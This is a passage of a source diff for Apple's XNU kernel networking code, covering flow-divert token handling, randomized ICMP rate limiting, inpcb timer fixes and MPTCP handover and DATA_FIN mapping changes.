                error = flow_divert_create_connect_packet(fd_cb, to, so, p, &connect_packet);
                if (error) {
                        goto done;
@@ -3343,7 +3443,7 @@ flow_divert_connect_out_internal(struct socket *so, struct sockaddr *to, proc_t
 
                if (!implicit || SOCK_TYPE(so) == SOCK_STREAM) {
                        flow_divert_set_remote_endpoint(fd_cb, to);
-                       flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa), false);
+                       flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa));
                }
 
                if (implicit) {
@@ -3370,7 +3470,7 @@ flow_divert_connect_out_internal(struct socket *so, struct sockaddr *to, proc_t
                fd_cb->flags |= FLOW_DIVERT_CONNECT_STARTED;
        }
 
-       if (SOCK_TYPE(so) == SOCK_DGRAM) {
+       if (SOCK_TYPE(so) == SOCK_DGRAM && !(fd_cb->flags & FLOW_DIVERT_HAS_TOKEN)) {
                soisconnected(so);
        } else {
                soisconnecting(so);
@@ -3521,11 +3621,6 @@ flow_divert_data_out(struct socket *so, int flags, mbuf_t data, struct sockaddr
                if (error) {
                        goto done;
                }
-
-               if (so->so_flags1 & SOF1_DATA_IDEMPOTENT) {
-                       /* Open up the send window so that the data will get sent right away */
-                       fd_cb->send_window = (uint32_t)mbuf_pkthdr_len(data);
-               }
        } else {
                error = flow_divert_check_no_cellular(fd_cb) ||
                    flow_divert_check_no_expensive(fd_cb) ||
@@ -3798,6 +3893,8 @@ flow_divert_token_set(struct socket *so, struct sockopt *sopt)
 
                fd_cb->connect_token = token;
                token = NULL;
+
+               fd_cb->flags |= FLOW_DIVERT_HAS_TOKEN;
        }
 
        if (hmac_error == 0) {
index 5c320716768f0d207d9a0155439acda4c4327d1b..f24f476580817816b869dd1fb12051ae76c06f1a 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2000-2019 Apple Inc. All rights reserved.
+ * Copyright (c) 2000-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -694,7 +694,8 @@ struct icmp6stat {
 #define ICMPV6CTL_ND6_MAXQLEN           24
 #define ICMPV6CTL_ND6_ACCEPT_6TO4       25
 #define ICMPV6CTL_ND6_OPTIMISTIC_DAD    26      /* RFC 4429 */
-#define ICMPV6CTL_MAXID                 27
+#define ICMPV6CTL_ERRPPSLIMIT_RANDOM_INCR 27
+#define ICMPV6CTL_MAXID                 28
 
 #ifdef BSD_KERNEL_PRIVATE
 #define ICMPV6CTL_NAMES { \
index 42982241e01aefba40da9da71b8f2313c29cbb0e..3a45a787e6d37d36efe84f2ad38d481ac2aeaa6a 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2000-2013 Apple Inc. All rights reserved.
+ * Copyright (c) 2000-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -93,7 +93,8 @@ struct  icmpstat {
 #define ICMPCTL_STATS           2       /* statistics (read-only) */
 #define ICMPCTL_ICMPLIM         3
 #define ICMPCTL_TIMESTAMP       4       /* allow replies to time stamp requests */
-#define ICMPCTL_MAXID           5
+#define ICMPCTL_ICMPLIM_INCR    5
+#define ICMPCTL_MAXID           6
 
 #ifdef BSD_KERNEL_PRIVATE
 #define ICMPCTL_NAMES { \
index ef0731a8291254338bd83162ce91ff61f9022a38..6fd6e7121d9d1d03016665259b064a18808e1bbf 100644 (file)
@@ -331,8 +331,9 @@ in_pcbinit(void)
        lck_mtx_init(&inpcb_timeout_lock, inpcb_lock_grp, inpcb_lock_attr);
        inpcb_thread_call = thread_call_allocate_with_priority(inpcb_timeout,
            NULL, THREAD_CALL_PRIORITY_KERNEL);
+       /* Give it an arg so that we know that this is the fast timer */
        inpcb_fast_thread_call = thread_call_allocate_with_priority(
-               inpcb_timeout, NULL, THREAD_CALL_PRIORITY_KERNEL);
+               inpcb_timeout, &inpcb_timeout, THREAD_CALL_PRIORITY_KERNEL);
        if (inpcb_thread_call == NULL || inpcb_fast_thread_call == NULL) {
                panic("unable to alloc the inpcb thread call");
        }
@@ -353,7 +354,7 @@ in_pcbinit(void)
 static void
 inpcb_timeout(void *arg0, void *arg1)
 {
-#pragma unused(arg0, arg1)
+#pragma unused(arg1)
        struct inpcbinfo *ipi;
        boolean_t t, gc;
        struct intimercount gccnt, tmcnt;
@@ -419,10 +420,14 @@ inpcb_timeout(void *arg0, void *arg1)
                inpcb_ticking = INPCB_HAVE_TIMER_REQ(tmcnt);
        }
 
-       /* re-arm the timer if there's work to do */
+       /* arg0 will be set if we are the fast timer */
+       if (arg0 != NULL) {
+               inpcb_fast_timer_on = FALSE;
+       }
        inpcb_timeout_run--;
        VERIFY(inpcb_timeout_run >= 0 && inpcb_timeout_run < 2);
 
+       /* re-arm the timer if there's work to do */
        if (gccnt.intimer_nodelay > 0 || tmcnt.intimer_nodelay > 0) {
                inpcb_sched_timeout();
        } else if ((gccnt.intimer_fast + tmcnt.intimer_fast) <= 5) {
@@ -460,7 +465,7 @@ _inpcb_sched_timeout(unsigned int offset)
                inpcb_timeout_run++;
                if (offset == 0) {
                        inpcb_fast_timer_on = TRUE;
-                       thread_call_enter_delayed(inpcb_thread_call,
+                       thread_call_enter_delayed(inpcb_fast_thread_call,
                            deadline);
                } else {
                        inpcb_fast_timer_on = FALSE;
index b7b32693ab82e17d16bf819313d7333ba7699725..f4d981849ee063786738d700180f6701042f93a3 100644 (file)
@@ -80,6 +80,9 @@
 #include <kern/zalloc.h>
 #include <netinet/in_stat.h>
 #endif /* BSD_KERNEL_PRIVATE */
+#if !KERNEL
+#include <TargetConditionals.h>
+#endif
 
 #if IPSEC
 #include <netinet6/ipsec.h> /* for IPSEC */
@@ -370,7 +373,7 @@ struct  xinpcb {
        u_quad_t        xi_alignment_hack;
 };
 
-#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
+#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
 struct inpcb64_list_entry {
        u_int64_t   le_next;
        u_int64_t   le_prev;
@@ -412,7 +415,7 @@ struct  xinpcb64 {
        struct  xsocket64 xi_socket;
        u_quad_t        xi_alignment_hack;
 };
-#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
+#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
 
 #ifdef PRIVATE
 struct xinpcb_list_entry {
index 800ec7cfbb14f26872d89f53cad4dae0159d43b6..1a97eb8c068b724faec3363c64f49e9b7862a965 100644 (file)
 
 #ifndef _NETINET_IN_SYSTM_H_
 #define _NETINET_IN_SYSTM_H_
+
+#ifndef DRIVERKIT
 #include <sys/appleapiopts.h>
+#endif /* DRIVERKIT */
+
 #include <sys/_types.h>
 
 /*
index 14aa9c9603881d7397a786546706defab832a727..0fb3d6f75d6daf58a66f945d4ee3abe6111d9384 100644 (file)
@@ -141,7 +141,6 @@ SYSCTL_INT(_net_inet_icmp, OID_AUTO, log_redirect,
 const static int icmp_datalen = 8;
 
 #if ICMP_BANDLIM
-
 /* Default values in case CONFIG_ICMP_BANDLIM is not defined in the MASTER file */
 #ifndef CONFIG_ICMP_BANDLIM
 #if XNU_TARGET_OS_OSX
@@ -159,15 +158,16 @@ const static int icmp_datalen = 8;
 static int      icmplim = CONFIG_ICMP_BANDLIM;
 SYSCTL_INT(_net_inet_icmp, ICMPCTL_ICMPLIM, icmplim, CTLFLAG_RW | CTLFLAG_LOCKED,
     &icmplim, 0, "");
-
 #else /* ICMP_BANDLIM */
-
 static int      icmplim = -1;
 SYSCTL_INT(_net_inet_icmp, ICMPCTL_ICMPLIM, icmplim, CTLFLAG_RD | CTLFLAG_LOCKED,
     &icmplim, 0, "");
-
 #endif /* ICMP_BANDLIM */
 
+static int      icmplim_random_incr = CONFIG_ICMP_BANDLIM;
+SYSCTL_INT(_net_inet_icmp, ICMPCTL_ICMPLIM_INCR, icmplim_random_incr, CTLFLAG_RW | CTLFLAG_LOCKED,
+    &icmplim_random_incr, 0, "");
+
 /*
  * ICMP broadcast echo sysctl
  */
@@ -1074,11 +1074,8 @@ ip_next_mtu(int mtu, int dir)
 
 /*
  * badport_bandlim() - check for ICMP bandwidth limit
- *
- *     Return 0 if it is ok to send an ICMP error response, -1 if we have
- *     hit our bandwidth limit and it is not ok.
- *
- *     If icmplim is <= 0, the feature is disabled and 0 is returned.
+ *     Returns false when it is ok to send ICMP error and true to limit sending
+ *     of ICMP error.
  *
  *     For now we separate the TCP and UDP subsystems w/ different 'which'
  *     values.  We may eventually remove this separation (and simplify the
@@ -1098,7 +1095,8 @@ badport_bandlim(int which)
        static int lpackets[BANDLIM_MAX + 1];
        uint64_t time;
        uint64_t secs;
-
+       static boolean_t is_initialized = FALSE;
+       static int icmplim_random;
        const char *bandlimittype[] = {
                "Limiting icmp unreach response",
                "Limiting icmp ping response",
@@ -1113,6 +1111,14 @@ badport_bandlim(int which)
                return false;
        }
 
+       if (is_initialized == FALSE) {
+               if (icmplim_random_incr > 0 &&
+                   icmplim <= INT32_MAX - (icmplim_random_incr + 1)) {
+                       icmplim_random = icmplim + (random() % icmplim_random_incr) + 1;
+               }
+               is_initialized = TRUE;
+       }
+
        time = net_uptime();
        secs = time - lticks[which];
 
@@ -1121,11 +1127,11 @@ badport_bandlim(int which)
         */
 
        if (secs > 1) {
-               if (lpackets[which] > icmplim) {
+               if (lpackets[which] > icmplim_random) {
                        printf("%s from %d to %d packets per second\n",
                            bandlimittype[which],
                            lpackets[which],
-                           icmplim
+                           icmplim_random
                            );
                }
                lticks[which] = time;
@@ -1135,9 +1141,16 @@ badport_bandlim(int which)
        /*
         * bump packet count
         */
-
-       if (++lpackets[which] > icmplim) {
-               return true;
+       if (++lpackets[which] > icmplim_random) {
+               /*
+                * After hitting the randomized limit, we further randomize the
+                * behavior of how we apply rate limitation.
+                * We rate limit based on probability that increases with the
+                * increase in lpackets[which] count.
+                */
+               if ((random() % (lpackets[which] - icmplim_random)) != 0) {
+                       return true;
+               }
        }
        return false;
 }
index 39fabb2b1a39538bca49c4e4b3d7a247e45ac42c..85a8cebc17245d25404a55f3c89ef91adf5d12e7 100644 (file)
@@ -792,7 +792,7 @@ mptcp_subflow_is_slow(struct mptses *mpte, struct mptsub *mpts)
        struct tcpcb *tp = sototcpcb(mpts->mpts_socket);
        int fail_thresh = mptcp_fail_thresh;
 
-       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) {
+       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) {
                fail_thresh *= 2;
        }
 
@@ -908,7 +908,9 @@ mptcp_get_subflow(struct mptses *mpte, struct mptsub **preferred)
         * Second Step: Among best and second_best. Choose the one that is
         * most appropriate for this particular service-type.
         */
-       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) {
+       if (mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) {
+               return mptcp_return_subflow(best);
+       } else if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) {
                /*
                 * Only handover if Symptoms tells us to do so.
                 */
@@ -1363,16 +1365,6 @@ mptcp_handle_deferred_upcalls(struct mppcb *mpp, uint32_t flag)
        }
 }
 
-void
-mptcp_ask_for_nat64(struct ifnet *ifp)
-{
-       in6_post_msg(ifp, KEV_INET6_REQUEST_NAT64_PREFIX, NULL, NULL);
-
-       os_log_info(mptcp_log_handle,
-           "%s: asked for NAT64-prefix on %s\n", __func__,
-           ifp->if_name);
-}
-
 static void
 mptcp_reset_itfinfo(struct mpt_itf_info *info)
 {
@@ -1517,7 +1509,7 @@ mptcp_session_necp_cb(void *handle, int action, uint32_t interface_index,
                }
 
                dst = mptcp_get_session_dst(mpte, has_v6, has_v4);
-               if (dst && (dst->sa_family == AF_INET || dst->sa_family == 0) &&
+               if (dst && dst->sa_family == AF_INET &&
                    has_v6 && !has_nat64 && !has_v4) {
                        if (found_slot) {
                                mpte->mpte_itfinfo[slot_index].ifindex = ifindex;
@@ -1525,7 +1517,6 @@ mptcp_session_necp_cb(void *handle, int action, uint32_t interface_index,
                                mpte->mpte_itfinfo[slot_index].has_v6_conn = has_v6;
                                mpte->mpte_itfinfo[slot_index].has_nat64_conn = has_nat64;
                        }
-                       mptcp_ask_for_nat64(ifp);
                        goto out;
                }
 
index 2767e56362d4a24816970dc1dd9491367d3030e6..31552007b605191c20ed8edb33a7f3e7975df5c2 100644 (file)
@@ -137,7 +137,7 @@ mptcp_setup_join_subflow_syn_opts(struct socket *so, u_char *opt, unsigned optle
        if (tp->t_mpflags & TMPF_BACKUP_PATH) {
                mpjoin_req.mmjo_subtype_bkp |= MPTCP_BACKUP;
        } else if (inp->inp_boundifp && IFNET_IS_CELLULAR(inp->inp_boundifp) &&
-           mpts->mpts_mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE) {
+           mptcp_subflows_need_backup_flag(mpts->mpts_mpte)) {
                mpjoin_req.mmjo_subtype_bkp |= MPTCP_BACKUP;
                tp->t_mpflags |= TMPF_BACKUP_PATH;
        } else {
@@ -974,6 +974,10 @@ mptcp_do_mpcapable_opt(struct tcpcb *tp, u_char *cp, struct tcphdr *th,
        if (((struct mptcp_mpcapable_opt_common *)cp)->mmco_flags &
            MPCAP_UNICAST_IPBIT) {
                mpte->mpte_flags |= MPTE_UNICAST_IP;
+
+               /* We need an explicit signal for the addresses - zero the existing ones */
+               memset(&mpte->mpte_sub_dst_v4, 0, sizeof(mpte->mpte_sub_dst_v4));
+               memset(&mpte->mpte_sub_dst_v6, 0, sizeof(mpte->mpte_sub_dst_v6));
        }
 
        rsp = (struct mptcp_mpcapable_opt_rsp *)cp;
@@ -1426,6 +1430,8 @@ mptcp_do_dss_opt(struct tcpcb *tp, u_char *cp, struct tcphdr *th)
        if (dss_rsp->mdss_subtype == MPO_DSS) {
                if (dss_rsp->mdss_flags & MDSS_F) {
                        tp->t_rcv_map.mpt_dfin = 1;
+               } else {
+                       tp->t_rcv_map.mpt_dfin = 0;
                }
 
                mptcp_do_dss_opt_meat(cp, tp, th);
@@ -1548,7 +1554,7 @@ mptcp_do_add_addr_opt(struct mptses *mpte, u_char *cp)
        }
 
        if (addr_opt->maddr_len == MPTCP_ADD_ADDR_OPT_LEN_V4) {
-               struct sockaddr_in *dst = &mpte->mpte_dst_unicast_v4;
+               struct sockaddr_in *dst = &mpte->mpte_sub_dst_v4;
                struct in_addr *addr = &addr_opt->maddr_u.maddr_addrv4;
                in_addr_t haddr = ntohl(addr->s_addr);
 
@@ -1573,7 +1579,7 @@ mptcp_do_add_addr_opt(struct mptses *mpte, u_char *cp)
                dst->sin_port = mpte->__mpte_dst_v4.sin_port;
                dst->sin_addr.s_addr = addr->s_addr;
        } else {
-               struct sockaddr_in6 *dst = &mpte->mpte_dst_unicast_v6;
+               struct sockaddr_in6 *dst = &mpte->mpte_sub_dst_v6;
                struct in6_addr *addr = &addr_opt->maddr_u.maddr_addrv6;
 
                if (IN6_IS_ADDR_LINKLOCAL(addr) ||
index f00002616c4ecd12183327d2de590b19475ebf23..3ea459376a17687eed84f8e0c27886e337ed0e3c 100644 (file)
@@ -495,27 +495,23 @@ mptcp_session_create(struct mppcb *mpp)
 struct sockaddr *
 mptcp_get_session_dst(struct mptses *mpte, boolean_t ipv6, boolean_t ipv4)
 {
-       if (!(mpte->mpte_flags & MPTE_UNICAST_IP)) {
-               return &mpte->mpte_dst;
+       if (ipv6 && mpte->mpte_sub_dst_v6.sin6_family == AF_INET6) {
+               return (struct sockaddr *)&mpte->mpte_sub_dst_v6;
        }
 
-       if (ipv6 && mpte->mpte_dst_unicast_v6.sin6_family == AF_INET6) {
-               return (struct sockaddr *)&mpte->mpte_dst_unicast_v6;
-       }
-
-       if (ipv4 && mpte->mpte_dst_unicast_v4.sin_family == AF_INET) {
-               return (struct sockaddr *)&mpte->mpte_dst_unicast_v4;
+       if (ipv4 && mpte->mpte_sub_dst_v4.sin_family == AF_INET) {
+               return (struct sockaddr *)&mpte->mpte_sub_dst_v4;
        }
 
        /* The interface has neither IPv4 nor IPv6 routes. Give our best guess,
         * meaning we prefer IPv6 over IPv4.
         */
-       if (mpte->mpte_dst_unicast_v6.sin6_family == AF_INET6) {
-               return (struct sockaddr *)&mpte->mpte_dst_unicast_v6;
+       if (mpte->mpte_sub_dst_v6.sin6_family == AF_INET6) {
+               return (struct sockaddr *)&mpte->mpte_sub_dst_v6;
        }
 
-       if (mpte->mpte_dst_unicast_v4.sin_family == AF_INET) {
-               return (struct sockaddr *)&mpte->mpte_dst_unicast_v4;
+       if (mpte->mpte_sub_dst_v4.sin_family == AF_INET) {
+               return (struct sockaddr *)&mpte->mpte_sub_dst_v4;
        }
 
        /* We don't yet have a unicast IP */
@@ -883,6 +879,7 @@ mptcp_check_subflows_and_add(struct mptses *mpte)
                return;
        }
 
+       /* Just to see if we have an IP-address available */
        if (mptcp_get_session_dst(mpte, false, false) == NULL) {
                return;
        }
@@ -921,6 +918,13 @@ mptcp_check_subflows_and_add(struct mptses *mpte)
 
                if (IFNET_IS_CELLULAR(ifp)) {
                        cellular_viable = TRUE;
+
+                       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER ||
+                           mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) {
+                               if (!mptcp_is_wifi_unusable_for_session(mpte)) {
+                                       continue;
+                               }
+                       }
                }
 
                TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) {
@@ -943,10 +947,11 @@ mptcp_check_subflows_and_add(struct mptses *mpte)
                                need_to_ask_symptoms = TRUE;
                        }
 
-                       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) {
+                       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) {
                                os_log(mptcp_log_handle,
-                                   "%s - %lx: handover: cell %u wifi-state %d flags %#x rxt %u first-party %u sb_cc %u ifindex %u this %u rtt %u rttvar %u rto %u\n",
+                                   "%s - %lx: %s: cell %u wifi-state %d flags %#x rxt %u first-party %u sb_cc %u ifindex %u this %u rtt %u rttvar %u rto %u\n",
                                    __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte),
+                                   mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER ? "handover" : "pure-handover",
                                    IFNET_IS_CELLULAR(subifp),
                                    mptcp_is_wifi_unusable_for_session(mpte),
                                    mpts->mpts_flags,
@@ -1058,13 +1063,6 @@ mptcp_check_subflows_and_add(struct mptses *mpte)
                        dst = (struct sockaddr *)&nat64pre;
                }
 
-               /* Initial subflow started on a NAT64'd address? */
-               if (!(mpte->mpte_flags & MPTE_UNICAST_IP) &&
-                   mpte->mpte_dst.sa_family == AF_INET6 &&
-                   mpte->mpte_dst_v4_nat64.sin_family == AF_INET) {
-                       dst = (struct sockaddr *)&mpte->mpte_dst_v4_nat64;
-               }
-
                if (dst->sa_family == AF_INET && !info->has_v4_conn) {
                        continue;
                }
@@ -1085,36 +1083,36 @@ static void
 mptcp_remove_cell_subflows(struct mptses *mpte)
 {
        struct mptsub *mpts, *tmpts;
-       boolean_t found = false;
 
-       TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) {
+       TAILQ_FOREACH_SAFE(mpts, &mpte->mpte_subflows, mpts_entry, tmpts) {
                const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp;
 
-               if (ifp == NULL || IFNET_IS_CELLULAR(ifp)) {
+               if (ifp == NULL || !IFNET_IS_CELLULAR(ifp)) {
                        continue;
                }
 
-               /* We have a functioning subflow on WiFi. No need for cell! */
-               if (mpts->mpts_flags & MPTSF_CONNECTED &&
-                   !mptcp_subflow_disconnecting(mpts)) {
-                       found = true;
-               }
-       }
+               os_log(mptcp_log_handle, "%s - %lx: removing cell subflow\n",
+                   __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte));
 
-       /* Didn't found functional sub on WiFi - stay on cell */
-       if (!found) {
-               return;
+               soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST);
        }
 
+       return;
+}
+
+static void
+mptcp_remove_wifi_subflows(struct mptses *mpte)
+{
+       struct mptsub *mpts, *tmpts;
+
        TAILQ_FOREACH_SAFE(mpts, &mpte->mpte_subflows, mpts_entry, tmpts) {
                const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp;
 
-               /* Only remove cellular subflows */
-               if (ifp == NULL || !IFNET_IS_CELLULAR(ifp)) {
+               if (ifp == NULL || IFNET_IS_CELLULAR(ifp)) {
                        continue;
                }
 
-               os_log(mptcp_log_handle, "%s - %lx: removing cell subflow\n",
+               os_log(mptcp_log_handle, "%s - %lx: removing wifi subflow\n",
                    __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte));
 
                soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST);
@@ -1123,7 +1121,69 @@ mptcp_remove_cell_subflows(struct mptses *mpte)
        return;
 }
 
-/* Returns true if it removed a subflow on cell */
+static void
+mptcp_pure_handover_subflows_remove(struct mptses *mpte)
+{
+       int wifi_unusable = mptcp_is_wifi_unusable_for_session(mpte);
+       boolean_t found_working_wifi_subflow = false;
+       boolean_t found_working_cell_subflow = false;
+
+       struct mptsub *mpts;
+
+       /*
+        * Look for a subflow that is on a non-cellular interface in connected
+        * state.
+        *
+        * In that case, remove all cellular subflows.
+        *
+        * If however there is no connected subflow
+        */
+       TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) {
+               const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp;
+               struct socket *so;
+               struct tcpcb *tp;
+
+               if (ifp == NULL) {
+                       continue;
+               }
+
+               so = mpts->mpts_socket;
+               tp = sototcpcb(so);
+
+               if (!(mpts->mpts_flags & MPTSF_CONNECTED) ||
+                   tp->t_state != TCPS_ESTABLISHED ||
+                   mptcp_subflow_disconnecting(mpts)) {
+                       continue;
+               }
+
+               if (IFNET_IS_CELLULAR(ifp)) {
+                       found_working_cell_subflow = true;
+               } else {
+                       os_log_debug(mptcp_log_handle, "%s - %lx: rxt %u sb_cc %u unusable %d\n",
+                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), tp->t_rxtshift, mptetoso(mpte)->so_snd.sb_cc, wifi_unusable);
+                       if (!mptcp_handover_use_cellular(mpte, tp)) {
+                               found_working_wifi_subflow = true;
+                       }
+               }
+       }
+
+       /*
+        * Couldn't find a working subflow, let's not remove those on a cellular
+        * interface.
+        */
+       os_log_debug(mptcp_log_handle, "%s - %lx: Found Wi-Fi: %u Found Cellular %u",
+           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte),
+           found_working_wifi_subflow, found_working_cell_subflow);
+       if (!found_working_wifi_subflow && wifi_unusable) {
+               if (found_working_cell_subflow) {
+                       mptcp_remove_wifi_subflows(mpte);
+               }
+               return;
+       }
+
+       mptcp_remove_cell_subflows(mpte);
+}
+
 static void
 mptcp_handover_subflows_remove(struct mptses *mpte)
 {
@@ -1176,6 +1236,7 @@ static void
 mptcp_targetbased_subflows_remove(struct mptses *mpte)
 {
        uint64_t time_now = mach_continuous_time();
+       struct mptsub *mpts;
 
        if (mpte->mpte_time_target != 0 &&
            (int64_t)(mpte->mpte_time_target - time_now) <= 0 &&
@@ -1184,7 +1245,20 @@ mptcp_targetbased_subflows_remove(struct mptses *mpte)
                return;
        }
 
-       mptcp_remove_cell_subflows(mpte);
+       TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) {
+               const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp;
+
+               if (ifp == NULL || IFNET_IS_CELLULAR(ifp)) {
+                       continue;
+               }
+
+               /* We have a functioning subflow on WiFi. No need for cell! */
+               if (mpts->mpts_flags & MPTSF_CONNECTED &&
+                   !mptcp_subflow_disconnecting(mpts)) {
+                       mptcp_remove_cell_subflows(mpte);
+                       break;
+               }
+       }
 }
 
 /*
@@ -1200,6 +1274,10 @@ mptcp_check_subflows_and_remove(struct mptses *mpte)
 
        socket_lock_assert_owned(mptetoso(mpte));
 
+       if (mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) {
+               mptcp_pure_handover_subflows_remove(mpte);
+       }
+
        if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) {
                mptcp_handover_subflows_remove(mpte);
        }
@@ -1542,6 +1620,7 @@ mptcp_subflow_necp_cb(void *handle, __unused int action,
        mptcp_sched_create_subflows(mpte);
 
        if ((mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER ||
+           mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER ||
            mpte->mpte_svctype == MPTCP_SVCTYPE_TARGET_BASED) &&
            viable != NULL) {
                *viable = 1;
@@ -1639,6 +1718,9 @@ mptcp_subflow_socreate(struct mptses *mpte, struct mptsub *mpts, int dom,
        if (mp_so->so_flags1 & SOF1_DATA_IDEMPOTENT) {
                (*so)->so_flags1 |= SOF1_DATA_IDEMPOTENT;
        }
+       if (mp_so->so_flags1 & SOF1_DATA_AUTHENTICATED) {
+               (*so)->so_flags1 |= SOF1_DATA_AUTHENTICATED;
+       }
 
        /* Inherit uuid and create the related flow. */
        if (!uuid_is_null(mpsotomppcb(mp_so)->necp_client_uuid)) {
@@ -1920,7 +2002,7 @@ mptcp_subflow_soconnectx(struct mptses *mpte, struct mptsub *mpts)
 
 static int
 mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn,
-    uint32_t rseq, uint16_t dlen)
+    uint32_t rseq, uint16_t dlen, uint8_t dfin)
 {
        struct mptsub *mpts = sototcpcb(so)->t_mpsub;
 
@@ -1935,12 +2017,14 @@ mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn,
        if (m->m_pkthdr.pkt_flags & PKTF_MPTCP) {
                if (off && (dsn != m->m_pkthdr.mp_dsn ||
                    rseq != m->m_pkthdr.mp_rseq ||
-                   dlen != m->m_pkthdr.mp_rlen)) {
-                       os_log_error(mptcp_log_handle, "%s - %lx: Received incorrect second mapping: %u - %u , %u - %u, %u - %u\n",
+                   dlen != m->m_pkthdr.mp_rlen ||
+                   dfin != !!(m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN))) {
+                       os_log_error(mptcp_log_handle, "%s - %lx: Received incorrect second mapping: DSN: %u - %u , SSN: %u - %u, DLEN: %u - %u, DFIN: %u - %u\n",
                            __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpts->mpts_mpte),
                            (uint32_t)dsn, (uint32_t)m->m_pkthdr.mp_dsn,
                            rseq, m->m_pkthdr.mp_rseq,
-                           dlen, m->m_pkthdr.mp_rlen);
+                           dlen, m->m_pkthdr.mp_rlen,
+                           dfin, !!(m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN));
 
                        soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST);
                        return -1;
@@ -1948,12 +2032,12 @@ mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn,
        }
 
        /* If mbuf is beyond right edge of the mapping, we need to split */
-       if (m_pktlen(m) > dlen - off) {
-               struct mbuf *new = m_split(m, dlen - off, M_DONTWAIT);
+       if (m_pktlen(m) > dlen - dfin - off) {
+               struct mbuf *new = m_split(m, dlen - dfin - off, M_DONTWAIT);
                if (new == NULL) {
-                       os_log_error(mptcp_log_handle, "%s - %lx: m_split failed dlen %u off %d pktlen %d, killing subflow %d",
+                       os_log_error(mptcp_log_handle, "%s - %lx: m_split failed dlen %u dfin %u off %d pktlen %d, killing subflow %d",
                            __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpts->mpts_mpte),
-                           dlen, off, m_pktlen(m),
+                           dlen, dfin, off, m_pktlen(m),
                            mpts->mpts_connid);
 
                        soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST);
@@ -1973,10 +2057,19 @@ mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn,
        m->m_pkthdr.pkt_flags |= PKTF_MPTCP;
        m->m_pkthdr.mp_dsn = dsn + off;
        m->m_pkthdr.mp_rseq = rseq + off;
-
        VERIFY(m_pktlen(m) < UINT16_MAX);
        m->m_pkthdr.mp_rlen = (uint16_t)m_pktlen(m);
 
+       /* Only put the DATA_FIN-flag on the last mbuf of this mapping */
+       if (dfin) {
+               if (m->m_pkthdr.mp_dsn + m->m_pkthdr.mp_rlen < dsn + dlen - dfin) {
+                       m->m_pkthdr.pkt_flags &= ~PKTF_MPTCP_DFIN;
+               } else {
+                       m->m_pkthdr.pkt_flags |= PKTF_MPTCP_DFIN;
+               }
+       }
+
+
        mpts->mpts_flags |= MPTSF_FULLY_ESTABLISHED;
 
        return 0;
@@ -2123,7 +2216,8 @@ mptcp_subflow_soreceive(struct socket *so, struct sockaddr **psa,
        SBLASTMBUFCHK(&so->so_rcv, "mptcp_subflow_soreceive 1");
 
        while (m != NULL) {
-               int dlen = 0, dfin = 0, error_out = 0;
+               int dlen = 0, error_out = 0, off = 0;
+               uint8_t dfin = 0;
                struct mbuf *start = m;
                uint64_t dsn;
                uint32_t sseq;
@@ -2202,6 +2296,7 @@ fallback:
 
                                if (m_iter->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN) {
                                        dfin = 1;
+                                       dlen--;
